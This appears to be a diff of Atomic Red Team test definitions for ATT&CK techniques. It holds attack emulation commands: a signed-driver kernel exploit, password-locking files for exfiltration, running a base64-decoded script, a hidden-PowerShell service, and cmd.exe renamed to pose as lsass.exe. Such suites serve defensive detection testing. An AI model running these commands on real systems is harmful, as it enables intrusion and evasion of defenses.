@@ -61,14 +51,26 @@ sudo modprobe #{rootkit_file}
 <br/>
 <br/>

-## Atomic Test #3 - LD_PRELOAD based Rootkit
-LD_PRELOAD based Rootkit
+## Atomic Test #3 - Windows Signed Driver Rootkit Test
+This test exploits a signed driver to execute code in Kernel.
+SHA1 C1D5CF8C43E7679B782630E93F5E6420CA1749A7
+We leverage the work done here:
+https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.html
+The hash of our PoC Exploit is
+SHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441
+This will simulate hiding a process.
+It would be wise if you only run this in a test environment

-**Supported Platforms:** Linux
+**Supported Platforms:** Windows


-#### Run it with `sh`!
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| driver_path | Path to the vulnerable driver | Path | C:\Drivers\driver.sys|
+
+#### Run it with `command_prompt`!
 ```
-export LD_PRELOAD=$PWD/#{rootkit_file}
+puppetstrings #{driver_path}
 ```
 <br/>
@@ -37,14 +37,28 @@ atomic_tests:
    name: sh
    command: |
      sudo modprobe #{rootkit_file}
- name: LD_PRELOAD based Rootkit
+
+- name: Windows Signed Driver Rootkit Test
  description: |
-    LD_PRELOAD based Rootkit
+    This test exploits a signed driver to execute code in Kernel.
+    SHA1 C1D5CF8C43E7679B782630E93F5E6420CA1749A7
+    We leverage the work done here:
+    https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.html
+    The hash of our PoC Exploit is
+    SHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441
+    This will simulate hiding a process.
+    It would be wise if you only run this in a test environment

  supported_platforms:
-    - linux
+    - windows

+  input_arguments:
+    driver_path:
+      description: Path to the vulnerable driver
+      type: Path
+      default: C:\Drivers\driver.sys
+      
  executor:
-    name: sh
+    name: command_prompt
    command: |
-      export LD_PRELOAD=$PWD/#{rootkit_file}
+      puppetstrings #{driver_path}
@@ -6,29 +6,17 @@ Two common accessibility programs are <code>C:\Windows\System32\sethc.exe</code>

 Depending on the version of Windows, an adversary may take advantage of these features in different ways because of code integrity enhancements. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in <code>%systemdir%\</code>, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. Examples for both methods:

-For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., <code>C:\Windows\System32\utilman.exe</code>) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over Remote Desktop Protocol will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
+For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., <code>C:\Windows\System32\utilman.exe</code>) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)

 For the debugger method on Windows Vista and later as well as Windows Server 2008 and later, for example, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for the accessibility program (e.g., "utilman.exe"). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with RDP will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)

 Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)

-*On-Screen Keyboard: <code>C:\Windows\System32\osk.exe</code>
-*Magnifier: <code>C:\Windows\System32\Magnify.exe</code>
-*Narrator: <code>C:\Windows\System32\Narrator.exe</code>
-*Display Switcher: <code>C:\Windows\System32\DisplaySwitch.exe</code>
-*App Switcher: <code>C:\Windows\System32\AtBroker.exe</code>
-
-Detection: Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious. Command line invocation of tools capable of modifying the Registry for associated keys are also suspicious. Utility arguments and the binaries themselves should be monitored for changes. Monitor Registry keys within <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options</code>.
-
-Platforms: Windows
-
-Data Sources: Windows Registry, File monitoring, Process monitoring
-
-Effective Permissions: SYSTEM
-
-Permissions Required: Administrator
-
-Contributors: Paul Speulstra, AECOM Global Security Operations Center</blockquote>
+* On-Screen Keyboard: <code>C:\Windows\System32\osk.exe</code>
+* Magnifier: <code>C:\Windows\System32\Magnify.exe</code>
+* Narrator: <code>C:\Windows\System32\Narrator.exe</code>
+* Display Switcher: <code>C:\Windows\System32\DisplaySwitch.exe</code>
+* App Switcher: <code>C:\Windows\System32\AtBroker.exe</code></blockquote>

 ## Atomic Tests

@@ -1,16 +1,6 @@
 # T1016 - System Network Configuration Discovery
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1016)
-<blockquote>Adversaries will likely look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp, ipconfig/ifconfig, nbtstat, and route.
-
-Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
-Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
-
-Platforms: Linux, macOS, Windows
-
-Data Sources: Process command-line parameters, Process monitoring
-
-Permissions Required: User</blockquote>
+<blockquote>Adversaries will likely look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).</blockquote>

 ## Atomic Tests

@@ -1,28 +1,18 @@
 # T1018 - Remote System Discovery
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1018)
-<blockquote>Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used. 
+<blockquote>Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used. Adversaries may also use local host files in order to discover the hostname to IP address mappings of remote systems. 

-===Windows===
+### Windows

-Examples of tools and commands that acquire this information include "ping" or "net view" using Net.
+Examples of tools and commands that acquire this information include "ping" or "net view" using [Net](https://attack.mitre.org/software/S0039). The contents of the <code>C:\Windows\System32\Drivers\etc\hosts</code> file can be viewed to gain insight into the existing hostname to IP mappings on the system.

-===Mac===
+### Mac

-Specific to Mac, the <code>bonjour</code> protocol to discover additional Mac-based systems within the same broadcast domain. Utilities such as "ping" and others can be used to gather information about remote systems.
+Specific to Mac, the <code>bonjour</code> protocol to discover additional Mac-based systems within the same broadcast domain. Utilities such as "ping" and others can be used to gather information about remote systems. The contents of the <code>/etc/hosts</code> file can be viewed to gain insight into existing hostname to IP mappings on the system.

-===Linux===
+### Linux

-Utilities such as "ping" and others can be used to gather information about remote systems.
-
-Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
-Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
-
-Platforms: Linux, macOS, Windows
-
-Data Sources: Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
-
-Permissions Required: User, Administrator, SYSTEM</blockquote>
+Utilities such as "ping" and others can be used to gather information about remote systems. The contents of the <code>/etc/hosts</code> file can be viewed to gain insight into existing hostname to IP mappings on the system.</blockquote>

 ## Atomic Tests

@@ -2,29 +2,23 @@
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1022)
 <blockquote>Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.

-Other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over Command and Control Channel and Exfiltration Over Alternative Protocol
-
-Detection: Encryption software and encrypted files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known encryption utilities. This may yield a significant amount of benign events, depending on how systems in the environment are typically used. Often the encryption key is stated within command-line invocation of the software. 
-
-A process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures. 
-
-Network traffic may also be analyzed for entropy to determine if encrypted data is being transmitted. (Citation: Zhang 2013) If the communications channel is unencrypted, encrypted files of known file types can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers. (Citation: Wikipedia File Header Signatures)
-
-Platforms: Linux, macOS, Windows
-
-Data Sources: File monitoring, Binary file metadata, Process command-line parameters, Process monitoring
-
-Requires Network: No</blockquote>
+Other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over Command and Control Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)</blockquote>

 ## Atomic Tests

- [Atomic Test #1 - Data Encrypted](#atomic-test-1---data-encrypted)
+- [Atomic Test #1 - Data Encrypted with zip and gpg](#atomic-test-1---data-encrypted-with-zip-and-gpg)
+
+- [Atomic Test #2 - Compress Data and lock with password for Exfiltration with winrar](#atomic-test-2---compress-data-and-lock-with-password-for-exfiltration-with-winrar)
+
+- [Atomic Test #3 - Compress Data and lock with password for Exfiltration with winzip](#atomic-test-3---compress-data-and-lock-with-password-for-exfiltration-with-winzip)
+
+- [Atomic Test #4 - Compress Data and lock with password for Exfiltration with 7zip](#atomic-test-4---compress-data-and-lock-with-password-for-exfiltration-with-7zip)


 <br/>

-## Atomic Test #1 - Data Encrypted
-TODO
+## Atomic Test #1 - Data Encrypted with zip and gpg
+Encrypt data for exiltration

 **Supported Platforms:** macOS, CentOS, Ubuntu, Linux

@@ -41,3 +35,57 @@ gpg -c /tmp/victim-gpg.txt
 ls -l
 ```
 <br/>
+<br/>
+
+## Atomic Test #2 - Compress Data and lock with password for Exfiltration with winrar
+Note: Requires winrar installation
+rar a -p"blue" hello.rar (VARIANT)
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `command_prompt`!
+```
+mkdir ./tmp/victim-files
+cd ./tmp/victim-files
+echo "This file will be encrypted" > ./encrypted_file.txt
+rar a -hp"blue" hello.rar
+dir
+```
+<br/>
+<br/>
+
+## Atomic Test #3 - Compress Data and lock with password for Exfiltration with winzip
+Note: Requires winzip installation
+wzzip sample.zip -s"blueblue" *.txt (VARIANT)
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `command_prompt`!
+```
+path=%path%;"C:\Program Files (x86)\winzip"
+mkdir ./tmp/victim-files
+cd ./tmp/victim-files
+echo "This file will be encrypted" > ./encrypted_file.txt
+winzip32 -min -a -s"hello" archive.zip *
+dir
+```
+<br/>
+<br/>
+
+## Atomic Test #4 - Compress Data and lock with password for Exfiltration with 7zip
+Note: Requires 7zip installation
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `command_prompt`!
+```
+mkdir ./tmp/victim-files
+cd ./tmp/victim-files
+echo "This file will be encrypted" > ./encrypted_file.txt
+7z a archive.7z -pblue
+dir
+```
+<br/>
@@ -3,10 +3,9 @@ attack_technique: T1022
 display_name: Data Encrypted

 atomic_tests:
- name: Data Encrypted
+- name: Data Encrypted with zip and gpg
  description: |
-    TODO
-
+    Encrypt data for exiltration
  supported_platforms:
    - macos
    - centos
@@ -24,3 +23,48 @@ atomic_tests:
      gpg -c /tmp/victim-gpg.txt
      <enter passphrase and confirm>
      ls -l
+
+- name: Compress Data and lock with password for Exfiltration with winrar
+  description: |
+    Note: Requires winrar installation
+    rar a -p"blue" hello.rar (VARIANT)
+  supported_platforms:
+    - windows
+  executor:
+    name: command_prompt
+    command: |
+      mkdir ./tmp/victim-files
+      cd ./tmp/victim-files
+      echo "This file will be encrypted" > ./encrypted_file.txt
+      rar a -hp"blue" hello.rar
+      dir
+
+- name: Compress Data and lock with password for Exfiltration with winzip
+  description: |
+    Note: Requires winzip installation
+    wzzip sample.zip -s"blueblue" *.txt (VARIANT)
+  supported_platforms:
+    - windows
+  executor:
+    name: command_prompt
+    command: |
+      path=%path%;"C:\Program Files (x86)\winzip"
+      mkdir ./tmp/victim-files
+      cd ./tmp/victim-files
+      echo "This file will be encrypted" > ./encrypted_file.txt
+      winzip32 -min -a -s"hello" archive.zip *
+      dir
+
+- name: Compress Data and lock with password for Exfiltration with 7zip
+  description: |
+    Note: Requires 7zip installation
+  supported_platforms:
+    - windows
+  executor:
+    name: command_prompt
+    command: |
+      mkdir ./tmp/victim-files
+      cd ./tmp/victim-files
+      echo "This file will be encrypted" > ./encrypted_file.txt
+      7z a archive.7z -pblue
+      dir
@@ -0,0 +1,33 @@
+# T1027 - Obfuscated Files or Information
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1027)
+<blockquote>Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
+
+Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.
+
+Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)
+
+Adversaries may also obfuscate commands executed from payloads or directly via a [Command-Line Interface](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and whitelisting mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: PaloAlto EncodedCommand March 2017)
+
+Another example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography activity surrounding [Invoke-PSImage](https://attack.mitre.org/software/S0231). The Duqu malware encrypted the gathered information from a victim's system and hid it into an image followed by exfiltrating the image to a C2 server. (Citation: Wikipedia Duqu) By the end of 2017, an adversary group used [Invoke-PSImage](https://attack.mitre.org/software/S0231) to hide PowerShell commands in an image file (png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary. (Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Decode base64 Data into Script](#atomic-test-1---decode-base64-data-into-script)
+
+
+<br/>
+
+## Atomic Test #1 - Decode base64 Data into Script
+Creates a base64-encoded data file and decodes it into an executable shell script
+
+**Supported Platforms:** macOS, Linux
+
+
+#### Run it with `sh`!
+```
+sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat"
+cat /tmp/encoded.dat | base64 -d > /tmp/art.sh
+chmod +x /tmp/art.sh
+/tmp/art.sh
+```
+<br/>
@@ -0,0 +1,20 @@
+---
+attack_technique: T1027
+display_name: Obfuscated Files or Information
+
+atomic_tests:
+- name: Decode base64 Data into Script
+  description: |
+    Creates a base64-encoded data file and decodes it into an executable shell script
+
+  supported_platforms:
+    - macos
+    - linux
+
+  executor:
+    name: sh
+    command: |
+      sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat"
+      cat /tmp/encoded.dat | base64 -d > /tmp/art.sh
+      chmod +x /tmp/art.sh
+      /tmp/art.sh
@@ -1,18 +1,6 @@
 # T1028 - Windows Remote Management
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1028)
-<blockquote>Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the <code>winrm</code> command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)
-
-Detection: Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior. Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events.
-
-Platforms: Windows
-
-Data Sources: File monitoring, Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
-
-Permissions Required: User, Administrator
-
-System Requirements: WinRM listener turned on and configured on remote system
-
-Remote Support: Yes</blockquote>
+<blockquote>Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the <code>winrm</code> command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)</blockquote>

 ## Atomic Tests

@@ -37,7 +25,7 @@ Powershell Enable WinRM

 #### Run it with `powershell`!
 ```
-powershell Enable-PSRemoting -Force
+Enable-PSRemoting -Force
 ```
 <br/>
 <br/>
@@ -13,7 +13,7 @@ atomic_tests:
  executor:
    name: powershell
    command: |
-      powershell Enable-PSRemoting -Force
+      Enable-PSRemoting -Force

 - name: PowerShell Lateral Movement
  description: |
@@ -1,14 +1,6 @@
 # T1030 - Data Transfer Size Limits
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1030)
-<blockquote>An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.
-
-Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). If a process maintains a long connection during which it consistently sends fixed size data packets or a process opens connections and sends fixed sized data packets at regular intervals, it may be performing an aggregate data transfer. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
-
-Platforms: Linux, macOS, Windows
-
-Data Sources: Packet capture, Netflow/Enclave netflow, Process use of network, Process monitoring
-
-Requires Network: Yes</blockquote>
+<blockquote>An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.</blockquote>

 ## Atomic Tests

@@ -23,11 +15,6 @@ Take a file/directory, split it into 5Mb chunks
 **Supported Platforms:** macOS, CentOS, Ubuntu, Linux


-#### Inputs
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_file | TODO | todo | TODO|
-
 #### Run it with `sh`!
 ```
 cd /tmp/
@@ -13,12 +13,6 @@ atomic_tests:
    - ubuntu
    - linux

-  input_arguments:
-    output_file:
-      description: TODO
-      type: todo
-      default: TODO
-
  executor:
    name: sh
    command: |
@@ -1,26 +1,10 @@
 # T1031 - Modify Existing Service
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1031)
-<blockquote>Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and Reg.
+<blockquote>Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075).

-Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of Masquerading that may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.
+Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of [Masquerading](https://attack.mitre.org/techniques/T1036) that may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.

-Adversaries may also intentionally corrupt or kill services to execute malicious recovery programs/commands. (Citation: Twitter Service Recovery Nov 2017) (Citation: Microsoft Service Recovery Feb 2013)
-
-Detection: Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence. (Citation: TechNet Autoruns) 
-
-Service information is stored in the Registry at <code>HKLM\SYSTEM\CurrentControlSet\Services</code>.
-
-Command-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute cmd commands or scripts.
-
-Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Services may also be modified through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.
-
-Platforms: Windows
-
-Data Sources: Windows Registry, File monitoring, Process command-line parameters, Process monitoring
-
-Permissions Required: Administrator, SYSTEM
-
-Contributors: Travis Smith, Tripwire, Matthew Demaske, Adaptforward</blockquote>
+Adversaries may also intentionally corrupt or kill services to execute malicious recovery programs/commands. (Citation: Twitter Service Recovery Nov 2017) (Citation: Microsoft Service Recovery Feb 2013)</blockquote>

 ## Atomic Tests

@@ -1,26 +1,16 @@
 # T1033 - System Owner/User Discovery
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1033)
-<blockquote>===Windows===
+<blockquote>### Windows

-Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using Credential Dumping. The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs.
+Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs.

-===Mac===
+### Mac

 On Mac, the currently logged in user can be identified with <code>users</code>,<code>w</code>, and <code>who</code>.

-===Linux===
+### Linux

-On Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>.
-
-Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
-Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
-
-Platforms: Linux, macOS, Windows
-
-Data Sources: File monitoring, Process monitoring, Process command-line parameters
-
-Permissions Required: User, Administrator</blockquote>
+On Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>.</blockquote>

 ## Atomic Tests

@@ -40,7 +30,7 @@ Identify System owner or users on an endpoint
 #### Inputs
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| computer_name | Name of remote computer | strong | computer1|
+| computer_name | Name of remote computer | string | computer1|

 #### Run it with `command_prompt`!
 ```
@@ -1,3 +1,4 @@
+---
 attack_technique: T1033
 display_name: System Owner/User Discovery

@@ -12,7 +13,7 @@ atomic_tests:
  input_arguments:
    computer_name:
      description: Name of remote computer
-      type: strong
+      type: string
      default: computer1

  executor:
@@ -0,0 +1,30 @@
+# T1035 - Service Execution
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1035)
+<blockquote>Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with [New Service](https://attack.mitre.org/techniques/T1050) and [Modify Existing Service](https://attack.mitre.org/techniques/T1031) during service persistence or privilege escalation.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Execute a Command as a Service](#atomic-test-1---execute-a-command-as-a-service)
+
+
+<br/>
+
+## Atomic Test #1 - Execute a Command as a Service
+Creates a service specifying an aribrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly. 
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| service_name | Name of service to create | string | ARTService|
+| executable_command | Command to execute as a service | string | %COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:rt-marker.txt|
+
+#### Run it with `command_prompt`!
+```
+sc.exe create #{service_name} binPath= #{executable_command}
+sc.exe start #{service_name}
+sc.exe delete #{service_name}
+```
+<br/>
@@ -0,0 +1,29 @@
+---
+attack_technique: T1035
+display_name: Service Execution
+
+atomic_tests:
+- name: Execute a Command as a Service
+  description: |
+    Creates a service specifying an aribrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly. 
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    service_name:
+      description: Name of service to create
+      type: string
+      default: ARTService
+
+    executable_command:
+      description: Command to execute as a service
+      type: string
+      default: "%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt"
+
+  executor:
+    name: command_prompt
+    command: |
+      sc.exe create #{service_name} binPath= #{executable_command}
+      sc.exe start #{service_name}
+      sc.exe delete #{service_name}
@@ -0,0 +1,53 @@
+# T1036 - Masquerading
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1036)
+<blockquote>Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.
+
+One variant is for an executable to be placed in a commonly trusted directory or given the name of a legitimate, trusted program. Alternatively, the filename given may be a close approximation of legitimate programs or something innocuous. An example of this is when a common system utility or program is moved and renamed to avoid detection based on its usage.(Citation: FireEye APT10 Sept 2018) This is done to bypass tools that trust executables by relying on file name or path, as well as to deceive defenders and system administrators into thinking a file is benign by associating the name with something that is thought to be legitimate.
+
+A third variant uses the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver file named <code>March 25 \u202Excod.scr</code> will display as <code>March 25 rcs.docx</code>. A JavaScript file named <code>photo_high_re\u202Egnp.js</code> will be displayed as <code>photo_high_resj.png</code>. A common use of this technique is with spearphishing attachments since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default. 
+
+### Windows
+In another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as rundll32.exe. (Citation: Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is moved to a different directory and also renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)
+
+An example of abuse of trusted locations in Windows would be the <code>C:\Windows\System32</code> directory. Examples of trusted binary names that can be given to malicious binares include "explorer.exe" and "svchost.exe".
+
+### Linux
+Another variation of this technique includes malicious binaries changing the name of their running process to that of a trusted or benign process, after they have been launched as opposed to before. (Citation: Remaiten)
+
+An example of abuse of trusted locations in Linux  would be the <code>/bin</code> directory. Examples of trusted binary names that can be given to malicious binares include "rsyncd" and "dbus-inotifier". (Citation: Fysbis Palo Alto Analysis)  (Citation: Fysbis Dr Web Analysis)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Masquerading as Windows LSASS process](#atomic-test-1---masquerading-as-windows-lsass-process)
+
+- [Atomic Test #2 - Masquerading as Linux crond process.](#atomic-test-2---masquerading-as-linux-crond-process)
+
+
+<br/>
+
+## Atomic Test #1 - Masquerading as Windows LSASS process
+Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe.
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `command_prompt`!
+```
+cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
+cmd.exe /c %SystemRoot%\Temp\lsass.exe
+```
+<br/>
+<br/>
+
+## Atomic Test #2 - Masquerading as Linux crond process.
+Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon.
+
+**Supported Platforms:** Linux
+
+
+#### Run it with `sh`!
+```
+cp /bin/sh /tmp/crond
+/tmp/crond
+```
+<br/>
@@ -0,0 +1,30 @@
+---
+attack_technique: T1036
+display_name: Masquerading
+
+atomic_tests:
+- name: Masquerading as Windows LSASS process
+  description: |
+    Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe.
+
+  supported_platforms:
+    - windows
+
+  executor:
+    name: command_prompt
+    command: |
+      cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
+      cmd.exe /c %SystemRoot%\Temp\lsass.exe
+
+- name: Masquerading as Linux crond process.
+  description: |
+    Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon.
+
+  supported_platforms:
+    - linux
+
